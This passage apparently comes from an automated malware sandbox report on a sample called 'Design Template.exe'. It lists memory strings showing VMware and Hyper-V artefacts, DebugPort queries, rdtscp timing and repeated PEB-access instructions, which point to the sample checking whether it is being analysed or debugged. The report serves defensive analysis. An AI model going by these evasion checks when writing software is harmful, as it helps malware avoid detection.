        Source: C:\Windows\explorer.exeLast function: Thread delayed
        Source: C:\Windows\SysWOW64\rundll32.exeLast function: Thread delayed
        Source: explorer.exe, 00000007.00000000.302749185.0000000008A32000.00000004.00000001.sdmpBinary or memory string: VMware SATA CD00dRom0
        Source: explorer.exe, 00000007.00000000.302749185.0000000008A32000.00000004.00000001.sdmpBinary or memory string: SCSI\Disk&Ven_VMware&Prod_Virtual_disk\5&1ec51bf7&0&000000
        Source: explorer.exe, 00000007.00000000.303489272.0000000008B88000.00000004.00000001.sdmpBinary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
        Source: explorer.exe, 00000007.00000002.519851074.00000000059C0000.00000002.00000001.sdmpBinary or memory string: A Virtual Machine could not be started because Hyper-V is not installed.
        Source: explorer.exe, 00000007.00000000.303489272.0000000008B88000.00000004.00000001.sdmpBinary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}e
        Source: explorer.exe, 00000007.00000002.516979804.00000000048E0000.00000004.00000001.sdmpBinary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
        Source: explorer.exe, 00000007.00000000.303489272.0000000008B88000.00000004.00000001.sdmpBinary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}C
        Source: explorer.exe, 00000007.00000000.303083961.0000000008ACF000.00000004.00000001.sdmpBinary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\5&280b647&0&000000Datc
        Source: explorer.exe, 00000007.00000000.303083961.0000000008ACF000.00000004.00000001.sdmpBinary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\5&280B647&0&000000
        Source: explorer.exe, 00000007.00000000.299098647.00000000069DA000.00000004.00000001.sdmpBinary or memory string: VMware SATA CD002
        Source: explorer.exe, 00000007.00000002.519851074.00000000059C0000.00000002.00000001.sdmpBinary or memory string: A communication protocol error has occurred between the Hyper-V Host and Guest Compute Service.
        Source: explorer.exe, 00000007.00000002.519851074.00000000059C0000.00000002.00000001.sdmpBinary or memory string: The communication protocol version between the Hyper-V Host and Guest Compute Services is not supported.
        Source: explorer.exe, 00000007.00000002.519851074.00000000059C0000.00000002.00000001.sdmpBinary or memory string: An unknown internal message was received by the Hyper-V Compute Service.
        Source: C:\Users\user\Desktop\Design Template.exeProcess information queried: ProcessInformation
        Source: C:\Users\user\Desktop\Design Template.exeProcess queried: DebugPort
        Source: C:\Windows\SysWOW64\rundll32.exeProcess queried: DebugPort
        Source: C:\Users\user\Desktop\Design Template.exeCode function: 4_2_00A36A60 rdtscp
        Source: C:\Users\user\Desktop\Design Template.exeCode function: 2_2_004383A8 LdrLoadDll,
        Source: C:\Users\user\Desktop\Design Template.exeCode function: 2_2_00426369 LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,
        Source: C:\Users\user\Desktop\Design Template.exeCode function: 2_2_0043AA88 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Design Template.exeCode function: 2_2_0043A6E8 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Design Template.exeCode function: 2_2_0043A6F8 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Design Template.exeCode function: 2_2_00435F68 mov ecx, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Design Template.exeCode function: 2_2_0043A718 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Design Template.exeCode function: 2_2_0043A7B8 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Design Template.exeCode function: 4_2_00A320A0 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Design Template.exeCode function: 4_2_00A320A0 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Design Template.exeCode function: 4_2_00A320A0 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Design Template.exeCode function: 4_2_00A320A0 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Design Template.exeCode function: 4_2_00A320A0 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Design Template.exeCode function: 4_2_00A320A0 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Design Template.exeCode function: 4_2_00A490AF mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Design Template.exeCode function: 4_2_00A3F0BF mov ecx, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Design Template.exeCode function: 4_2_00A3F0BF mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Design Template.exeCode function: 4_2_00A3F0BF mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Design Template.exeCode function: 4_2_00A09080 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Design Template.exeCode function: 4_2_00A83884 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Design Template.exeCode function: 4_2_00A83884 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Design Template.exeCode function: 4_2_00A058EC mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Design Template.exeCode function: 4_2_00A9B8D0 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Design Template.exeCode function: 4_2_00A9B8D0 mov ecx, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Design Template.exeCode function: 4_2_00A9B8D0 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Design Template.exeCode function: 4_2_00A9B8D0 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Design Template.exeCode function: 4_2_00A9B8D0 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Design Template.exeCode function: 4_2_00A9B8D0 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Design Template.exeCode function: 4_2_00A1B02A mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Design Template.exeCode function: 4_2_00A1B02A mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Design Template.exeCode function: 4_2_00A1B02A mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Design Template.exeCode function: 4_2_00A1B02A mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Design Template.exeCode function: 4_2_00A3002D mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Design Template.exeCode function: 4_2_00A3002D mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Design Template.exeCode function: 4_2_00A3002D mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Design Template.exeCode function: 4_2_00A3002D mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Design Template.exeCode function: 4_2_00A3002D mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Design Template.exeCode function: 4_2_00AD4015 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Design Template.exeCode function: 4_2_00AD4015 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Design Template.exeCode function: 4_2_00A87016 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Design Template.exeCode function: 4_2_00A87016 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Design Template.exeCode function: 4_2_00A87016 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Design Template.exeCode function: 4_2_00AD1074 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Design Template.exeCode function: 4_2_00AC2073 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Design Template.exeCode function: 4_2_00A20050 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Design Template.exeCode function: 4_2_00A20050 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Design Template.exeCode function: 4_2_00A361A0 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Design Template.exeCode function: 4_2_00A361A0 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Design Template.exeCode function: 4_2_00A869A6 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Design Template.exeCode function: 4_2_00A851BE mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Design Template.exeCode function: 4_2_00A851BE mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Design Template.exeCode function: 4_2_00A851BE mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Design Template.exeCode function: 4_2_00A851BE mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Design Template.exeCode function: 4_2_00A2C182 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Design Template.exeCode function: 4_2_00A3A185 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Design Template.exeCode function: 4_2_00A32990 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Design Template.exeCode function: 4_2_00A941E8 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Design Template.exeCode function: 4_2_00A0B1E1 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Design Template.exeCode function: 4_2_00A0B1E1 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Design Template.exeCode function: 4_2_00A0B1E1 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Design Template.exeCode function: 4_2_00A24120 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Design Template.exeCode function: 4_2_00A24120 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Design Template.exeCode function: 4_2_00A24120 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Design Template.exeCode function: 4_2_00A24120 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Design Template.exeCode function: 4_2_00A24120 mov ecx, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Design Template.exeCode function: 4_2_00A3513A mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Design Template.exeCode function: 4_2_00A3513A mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Design Template.exeCode function: 4_2_00A09100 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Design Template.exeCode function: 4_2_00A09100 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Design Template.exeCode function: 4_2_00A09100 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Design Template.exeCode function: 4_2_00A0C962 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Design Template.exeCode function: 4_2_00A0B171 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Design Template.exeCode function: 4_2_00A0B171 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Design Template.exeCode function: 4_2_00A2B944 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Design Template.exeCode function: 4_2_00A2B944 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Design Template.exeCode function: 4_2_00A052A5 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Design Template.exeCode function: 4_2_00A052A5 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Design Template.exeCode function: 4_2_00A052A5 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Design Template.exeCode function: 4_2_00A052A5 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Design Template.exeCode function: 4_2_00A052A5 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Design Template.exeCode function: 4_2_00A1AAB0 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Design Template.exeCode function: 4_2_00A1AAB0 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Design Template.exeCode function: 4_2_00A3FAB0 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Design Template.exeCode function: 4_2_00A3D294 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Design Template.exeCode function: 4_2_00A3D294 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Design Template.exeCode function: 4_2_00A32AE4 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Design Template.exeCode function: 4_2_00A32ACB mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Design Template.exeCode function: 4_2_00A44A2C mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Design Template.exeCode function: 4_2_00A44A2C mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Design Template.exeCode function: 4_2_00A18A0A mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Design Template.exeCode function: 4_2_00A05210 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Design Template.exeCode function: 4_2_00A05210 mov ecx, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Design Template.exeCode function: 4_2_00A05210 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Design Template.exeCode function: 4_2_00A05210 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Design Template.exeCode function: 4_2_00A0AA16 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Design Template.exeCode function: 4_2_00A0AA16 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Design Template.exeCode function: 4_2_00ACAA16 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Design Template.exeCode function: 4_2_00ACAA16 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Design Template.exeCode function: 4_2_00A23A1C mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Design Template.exeCode function: 4_2_00ABB260 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Design Template.exeCode function: 4_2_00ABB260 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Design Template.exeCode function: 4_2_00AD8A62 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Design Template.exeCode function: 4_2_00A4927A mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Design Template.exeCode function: 4_2_00A09240 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Design Template.exeCode function: 4_2_00A09240 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Design Template.exeCode function: 4_2_00A09240 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Design Template.exeCode function: 4_2_00A09240 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Design Template.exeCode function: 4_2_00ACEA55 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Design Template.exeCode function: 4_2_00A94257 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Design Template.exeCode function: 4_2_00AD5BA5 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Design Template.exeCode function: 4_2_00A34BAD mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Design Template.exeCode function: 4_2_00A34BAD mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Design Template.exeCode function: 4_2_00A34BAD mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Design Template.exeCode function: 4_2_00AC138A mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Design Template.exeCode function: 4_2_00ABD380 mov ecx, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Design Template.exeCode function: 4_2_00A11B8F mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Design Template.exeCode function: 4_2_00A11B8F mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Design Template.exeCode function: 4_2_00A3B390 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Design Template.exeCode function: 4_2_00A32397 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Design Template.exeCode function: 4_2_00A303E2 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Design Template.exeCode function: 4_2_00A303E2 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Design Template.exeCode function: 4_2_00A303E2 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Design Template.exeCode function: 4_2_00A303E2 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Design Template.exeCode function: 4_2_00A303E2 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Design Template.exeCode function: 4_2_00A303E2 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Design Template.exeCode function: 4_2_00A2DBE9 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Design Template.exeCode function: 4_2_00A853CA mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Design Template.exeCode function: 4_2_00A853CA mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Design Template.exeCode function: 4_2_00AC131B mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Design Template.exeCode function: 4_2_00A0DB60 mov ecx, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Design Template.exeCode function: 4_2_00A33B7A mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Design Template.exeCode function: 4_2_00A33B7A mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Design Template.exeCode function: 4_2_00A0DB40 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Design Template.exeCode function: 4_2_00AD8B58 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Design Template.exeCode function: 4_2_00A0F358 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Design Template.exeCode function: 4_2_00A1849B mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Design Template.exeCode function: 4_2_00AC14FB mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Design Template.exeCode function: 4_2_00A86CF0 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Design Template.exeCode function: 4_2_00A86CF0 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Design Template.exeCode function: 4_2_00A86CF0 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Design Template.exeCode function: 4_2_00AD8CD6 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Design Template.exeCode function: 4_2_00A3BC2C mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Design Template.exeCode function: 4_2_00AD740D mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Design Template.exeCode function: 4_2_00AD740D mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Design Template.exeCode function: 4_2_00AD740D mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Design Template.exeCode function: 4_2_00A86C0A mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Design Template.exeCode function: 4_2_00A86C0A mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Design Template.exeCode function: 4_2_00A86C0A mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Design Template.exeCode function: 4_2_00A86C0A mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Design Template.exeCode function: 4_2_00AC1C06 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Design Template.exeCode function: 4_2_00AC1C06 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Design Template.exeCode function: 4_2_00AC1C06 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Design Template.exeCode function: 4_2_00AC1C06 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Design Template.exeCode function: 4_2_00AC1C06 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Design Template.exeCode function: 4_2_00AC1C06 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Design Template.exeCode function: 4_2_00AC1C06 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Design Template.exeCode function: 4_2_00AC1C06 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Design Template.exeCode function: 4_2_00AC1C06 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Design Template.exeCode function: 4_2_00AC1C06 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Design Template.exeCode function: 4_2_00AC1C06 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Design Template.exeCode function: 4_2_00AC1C06 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Design Template.exeCode function: 4_2_00AC1C06 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Design Template.exeCode function: 4_2_00AC1C06 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Design Template.exeCode function: 4_2_00A2746D mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Design Template.exeCode function: 4_2_00A3A44B mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Design Template.exeCode function: 4_2_00A9C450 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Design Template.exeCode function: 4_2_00A9C450 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Design Template.exeCode function: 4_2_00AD05AC mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Design Template.exeCode function: 4_2_00AD05AC mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Design Template.exeCode function: 4_2_00A335A1 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Design Template.exeCode function: 4_2_00A31DB5 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Design Template.exeCode function: 4_2_00A31DB5 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Design Template.exeCode function: 4_2_00A31DB5 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Design Template.exeCode function: 4_2_00A32581 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Design Template.exeCode function: 4_2_00A32581 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Design Template.exeCode function: 4_2_00A32581 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Design Template.exeCode function: 4_2_00A32581 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Design Template.exeCode function: 4_2_00A02D8A mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Design Template.exeCode function: 4_2_00A02D8A mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Design Template.exeCode function: 4_2_00A02D8A mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Design Template.exeCode function: 4_2_00A02D8A mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Design Template.exeCode function: 4_2_00A02D8A mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Design Template.exeCode function: 4_2_00A3FD9B mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Design Template.exeCode function: 4_2_00A3FD9B mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Design Template.exeCode function: 4_2_00A1D5E0 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Design Template.exeCode function: 4_2_00A1D5E0 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Design Template.exeCode function: 4_2_00ACFDE2 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Design Template.exeCode function: 4_2_00ACFDE2 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Design Template.exeCode function: 4_2_00ACFDE2 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Design Template.exeCode function: 4_2_00ACFDE2 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Design Template.exeCode function: 4_2_00AB8DF1 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Design Template.exeCode function: 4_2_00A86DC9 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Design Template.exeCode function: 4_2_00A86DC9 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Design Template.exeCode function: 4_2_00A86DC9 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Design Template.exeCode function: 4_2_00A86DC9 mov ecx, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Design Template.exeCode function: 4_2_00A86DC9 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Design Template.exeCode function: 4_2_00A86DC9 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Design Template.exeCode function: 4_2_00A0AD30 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Design Template.exeCode function: 4_2_00A13D34 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Design Template.exeCode function: 4_2_00A13D34 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Design Template.exeCode function: 4_2_00A13D34 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Design Template.exeCode function: 4_2_00A13D34 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Design Template.exeCode function: 4_2_00A13D34 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Design Template.exeCode function: 4_2_00A13D34 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Design Template.exeCode function: 4_2_00A13D34 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Design Template.exeCode function: 4_2_00A13D34 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Design Template.exeCode function: 4_2_00A13D34 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Design Template.exeCode function: 4_2_00A13D34 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Design Template.exeCode function: 4_2_00A13D34 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Design Template.exeCode function: 4_2_00A13D34 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Design Template.exeCode function: 4_2_00A13D34 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Design Template.exeCode function: 4_2_00ACE539 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Design Template.exeCode function: 4_2_00A34D3B mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Design Template.exeCode function: 4_2_00A34D3B mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Design Template.exeCode function: 4_2_00A34D3B mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Design Template.exeCode function: 4_2_00AD8D34 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Design Template.exeCode function: 4_2_00A8A537 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Design Template.exeCode function: 4_2_00A2C577 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Design Template.exeCode function: 4_2_00A2C577 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Design Template.exeCode function: 4_2_00A43D43 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Design Template.exeCode function: 4_2_00A83540 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Design Template.exeCode function: 4_2_00A27D50 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Design Template.exeCode function: 4_2_00AD0EA5 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Design Template.exeCode function: 4_2_00AD0EA5 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Design Template.exeCode function: 4_2_00AD0EA5 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Design Template.exeCode function: 4_2_00A846A7 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Design Template.exeCode function: 4_2_00A9FE87 mov eax, dword ptr fs:[00000030h]
